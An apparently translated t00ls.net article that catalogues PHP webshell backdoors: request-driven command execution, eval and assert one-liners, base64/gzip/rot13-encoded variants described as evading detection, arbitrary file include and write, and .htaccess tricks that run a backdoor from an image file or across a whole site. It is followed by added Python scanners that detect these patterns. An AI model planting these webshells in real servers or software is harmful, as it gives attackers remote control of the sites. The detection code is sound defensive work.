Author: alibaba. Source: t00ls.net. For more information, see t00ls.
PHP webshell Trojans are familiar to everyone, but how many kinds of them do you actually know?
This article describes the functions that common PHP backdoors rely on.
The functions commonly used by PHP backdoor Trojans fall into four categories:
1. Executing system commands: system, passthru, shell_exec, exec, popen, proc_open
2. Code execution and encoding: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. File inclusion and generation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. htaccess: SetHandler, auto_prepend_file, auto_append_file
1. Executing system commands:
system function
// test.php?cmd=ls
system($_GET['cmd']);
passthru function
// test.php?cmd=ls
passthru($_GET['cmd']);
shell_exec function
// test.php?cmd=ls
echo shell_exec($_GET['cmd']);
exec function
// test.php?cmd=ls
$arr = array();
exec($_GET['cmd'], $arr);
print_r($arr);
popen function
// test.php?cmd=ls
$handle = popen($_GET['cmd'], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open function
// test.php?cmd=ls
$descriptorspec = array(
    0 => array('pipe', 'r'),
    1 => array('pipe', 'w'),
    2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET['cmd'], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1], 1024), "\n"));
print_r($output);
2. Code execution and encoding:
eval function
// The most common Trojan
eval($_POST['cmd']);
base64_decode function
// Encode the code to evade detection and stay hidden
// Decodes to: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate function
// Encode the code to evade detection and stay hidden
// Decodes to: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1lZnFqIQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress function
// Encode the code to evade detection and stay hidden
// Decodes to: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode function
// Encode the code to evade detection and stay hidden
// Decodes to: eval($_POST['cmd']);
eval(gzdecode(base64_decode('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk14259w0bga5yqfaaaaa=')));
str_rot13 function
// Encode the code to evade detection and stay hidden
// Decodes to: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
assert function
// Works like eval
assert($_POST['cmd']);
call_user_func function
// Call assert through call_user_func
call_user_func('assert', $_POST['cmd']);
call_user_func function
// Call any function through call_user_func
// test.php?a=assert&cmd=phpinfo()
call_user_func($_GET['a'], $_REQUEST['cmd']);
Variable function call
// Call any function by name
// test.php?a=assert&cmd=phpinfo()
$_GET['a']($_REQUEST['cmd']);
3. File inclusion and generation:
require function
// Include any file
// test.php?file=112123.jpg
require($_GET['file']);
require_once function
// Include any file
// test.php?file=112123.jpg
require_once($_GET['file']);
include function
// Include any file
// test.php?file=112123.jpg
include($_GET['file']);
include_once function
// Include any file
// test.php?file=112123.jpg
include_once($_GET['file']);
file_get_contents function
// Read any file
// test.php?f=config.inc.php
echo file_get_contents($_GET['f']);
file_put_contents function
// Write a file with any content
// a=test.php&b=<?php eval($_POST[cmd]);?>
file_put_contents($_GET['a'], $_GET['b']);
fputs function
// Write a file with any content
// a=test.php&b=<?php eval($_POST[cmd]);?>
fputs(fopen($_GET['a'], "w"), $_GET['b']);
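The three categories above share one shape: a request value ($_GET, $_POST, $_REQUEST) reaches one of the listed functions, sometimes after passing through the decoders of category 2. The scanner below is an added example written for this page, not code from the original article: it peels base64_decode, gzinflate, gzuncompress, gzdecode and str_rot13 layers off an eval() literal, then flags any listed sink, or any variable function call, that is fed from a request superglobal. The function names (unwrap_payload, classify, scan, build_sample) and the sample PHP text are constructed here, and the decoders assume PHP's default modes (gzinflate is raw DEFLATE, gzuncompress the zlib wrapper, gzdecode the gzip wrapper).

```python
import base64
import codecs
import re
import zlib

# Sinks named in the three categories above, keyed to the category label.
SINKS = {
    "system": "command", "passthru": "command", "shell_exec": "command",
    "exec": "command", "popen": "command", "proc_open": "command",
    "eval": "code", "assert": "code", "call_user_func": "code",
    "require": "include", "require_once": "include",
    "include": "include", "include_once": "include",
    "file_get_contents": "file-read", "file_put_contents": "file-write",
    "fputs": "file-write", "fwrite": "file-write",
}
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

# A sink call whose argument list reaches a request superglobal on the same line.
DIRECT = re.compile(
    r"\b(" + "|".join(map(re.escape, SINKS)) + r")\s*\([^;]*?" + REQUEST_INPUT)
# A request value used as the function name itself: $_GET['a']($_REQUEST['cmd'])
VARIABLE_CALL = re.compile(REQUEST_INPUT + r"\s*\[[^\]]*\]\s*\(")
# eval(f(g('literal'))): group 1 is the wrapper chain, group 3 the literal.
WRAPPED = re.compile(r"\beval\s*\(\s*((?:\w+\s*\(\s*)+)(['\"])(.*?)\2\s*\)+")

# Python inverses of the encoding layers listed above (assumption: PHP defaults).
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),       # raw DEFLATE
    "gzuncompress": lambda b: zlib.decompress(b),                     # zlib wrapper
    "gzdecode": lambda b: zlib.decompress(b, 16 + zlib.MAX_WBITS),    # gzip wrapper
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}


def unwrap_payload(stmt):
    """Peel the decoder layers off eval(f(g('...'))) and return the plaintext.
    Returns None when the statement has another shape, uses a layer not in
    DECODERS, or the literal does not decode (a mis-copied ciphertext, say)."""
    m = WRAPPED.search(stmt)
    if not m:
        return None
    layers = re.findall(r"\w+", m.group(1))            # outermost first
    data = m.group(3).encode("latin-1", errors="replace")
    for name in reversed(layers):                      # innermost layer runs first
        decode = DECODERS.get(name)
        if decode is None:
            return None
        try:
            data = decode(data)
        except (ValueError, zlib.error):
            return None
    return data.decode("latin-1")


def classify(stmt):
    """Risk labels for one PHP statement (empty list means nothing suspicious)."""
    findings = []
    inner = unwrap_payload(stmt)
    if inner is not None:
        findings.append("obfuscated eval -> " + inner.strip())
        stmt = inner                                   # judge the decoded payload too
    for m in DIRECT.finditer(stmt):
        findings.append(f"{SINKS[m.group(1)]} sink {m.group(1)}() fed by request input")
    if VARIABLE_CALL.search(stmt):
        findings.append("request input used as the function name")
    return findings


def scan(source):
    """(line number, finding) pairs for every line of a PHP source text."""
    return [(n, f) for n, line in enumerate(source.splitlines(), 1)
            for f in classify(line)]


def build_sample():
    """Constructed test input: one statement per category, plain and wrapped.
    The encoded literals are generated here, not copied from anywhere."""
    payload = b"eval($_POST['cmd']);"
    b64 = base64.b64encode(payload).decode()
    deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = base64.b64encode(deflater.compress(payload) + deflater.flush()).decode()
    rot = codecs.encode("eval($_POST[cmd]);", "rot13")  # unquoted key: no inner quotes
    return "\n".join([
        "<?php",
        "system($_GET['cmd']);",
        f"eval(base64_decode('{b64}'));",
        f"eval(gzinflate(base64_decode('{raw}')));",
        f"eval(str_rot13('{rot}'));",
        "$_GET['a']($_REQUEST['cmd']);",
        "file_put_contents($_GET['a'], $_GET['b']);",
        "echo htmlspecialchars($_GET['name']);  // benign: no sink on this line",
    ])


if __name__ == "__main__":
    for lineno, finding in scan(build_sample()):
        print(f"line {lineno}: {finding}")
```

Regex matching is a triage aid, not a parser: a payload assembled across several variables, a sink reached through a string concatenation, or a decoder missing from DECODERS will not be reported, and unwrap_payload returns None rather than guessing when a literal does not decode. Its value is in what it does catch cheaply over a whole web root: the direct one-liners and the stacked encoding layers that this section lists.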
4. htaccess:
SetHandler
// Save the PHP code in a file with a non-PHP extension, for example x.jpg.
// Write the following into .htaccess.
// Requesting x.jpg then runs the backdoor Trojan.
<FilesMatch "x.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
auto_prepend_file
// Save the PHP code in a file with a non-PHP extension, for example 123.gif.
// Write the following into .htaccess; the file path must be absolute.
// Requesting any PHP file on the site then runs the PHP backdoor Trojan.
// Without changing the site's source code, this can record every $_REQUEST value or plant the Trojan across the whole site.
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
// Similar to auto_prepend_file.
// Save the PHP code in a file with a non-PHP extension, for example 123.gif.
// Write the following into .htaccess; the file path must be absolute.
// Requesting any PHP file on the site then runs the PHP backdoor Trojan.
php_value auto_append_file c:/apache2/htdocs/123.gif
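Both .htaccess tricks leave their footprint in the .htaccess file itself, so a sweep of every such file under the web root can pick them up. The auditor below is an added example, not code from the original article: it walks one .htaccess text, tracks the enclosing <Files>/<FilesMatch> scope, and reports a PHP handler attached to a non-PHP name (or, with no scope, to the whole directory) as well as any php_value auto_prepend_file or auto_append_file line. The PHP_EXTENSIONS set, the audit_htaccess name and the sample file are constructed for this example; the only value taken from the article is the sample path c:/apache2/htdocs/123.gif.

```python
import re

# Extensions Apache normally hands to PHP anyway; anything else mapped to the
# PHP handler deserves a look (assumption: adjust to the server's own config).
PHP_EXTENSIONS = {"php", "phtml", "php5", "php7", "phar"}

OPEN_RE = re.compile(r'^\s*<(Files|FilesMatch)\s+"?([^">]+?)"?\s*>', re.I)
CLOSE_RE = re.compile(r"^\s*</(?:Files|FilesMatch)\s*>", re.I)
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+(\S+)(.*)$", re.I)
INJECT_RE = re.compile(
    r"^\s*php_(?:admin_)?value\s+(auto_prepend_file|auto_append_file)\s+(\S+)", re.I)


def audit_htaccess(text):
    """Return (line number, finding) pairs for the two tricks described above:
    a PHP handler attached to a non-PHP file name, and auto_prepend_file /
    auto_append_file pulling an extra file into every PHP request."""
    findings = []
    scope = None  # pattern of the enclosing <Files>/<FilesMatch> block, if any
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = OPEN_RE.match(line)
        if m:
            scope = m.group(2)
            continue
        if CLOSE_RE.match(line):
            scope = None
            continue
        m = INJECT_RE.match(line)
        if m:
            findings.append((lineno, f"{m.group(1)} pulls {m.group(2)} into every PHP request"))
            continue
        m = HANDLER_RE.match(line)
        if not m or "php" not in line.lower():
            continue
        directive, rest = m.group(1), m.group(3)
        if scope is not None:
            # Inside <FilesMatch "x.jpg">: the pattern itself names the victim file.
            if "php" not in scope.lower():
                findings.append((lineno, f'{directive} hands "{scope}" to the PHP engine'))
        elif directive.lower() == "sethandler":
            # Bare SetHandler applies to every file in the directory.
            findings.append((lineno, f"{directive} hands every file in the directory to the PHP engine"))
        else:
            # AddHandler/AddType list extensions explicitly; report the non-PHP ones.
            odd = [e for e in re.findall(r"\.(\w+)", rest) if e.lower() not in PHP_EXTENSIONS]
            if odd:
                exts = ", ".join("." + e for e in odd)
                findings.append((lineno, f"{directive} hands {exts} to the PHP engine"))
    return findings


# Constructed sample .htaccess: a legitimate PHP mapping followed by the three
# patterns the auditor should report. Not taken from any real site.
SAMPLE_HTACCESS = "\n".join([
    "# constructed sample .htaccess",
    "Options -Indexes",
    '<FilesMatch "\\.php$">',
    "    SetHandler application/x-httpd-php",
    "</FilesMatch>",
    '<FilesMatch "x.jpg">',
    "    SetHandler application/x-httpd-php",
    "</FilesMatch>",
    "AddType application/x-httpd-php .jpg .gif",
    "php_value auto_prepend_file c:/apache2/htdocs/123.gif",
    "php_value display_errors Off",
])

if __name__ == "__main__":
    for lineno, finding in audit_htaccess(SAMPLE_HTACCESS):
        print(f".htaccess:{lineno}: {finding}")
```

A finding is a lead, not a verdict: the file the directive points at still has to be read, and a <FilesMatch> pattern that mixes PHP and non-PHP names in one alternation passes this check. Pairing the sweep with a check that .htaccess is not writable by the web server user removes the precondition both tricks depend on.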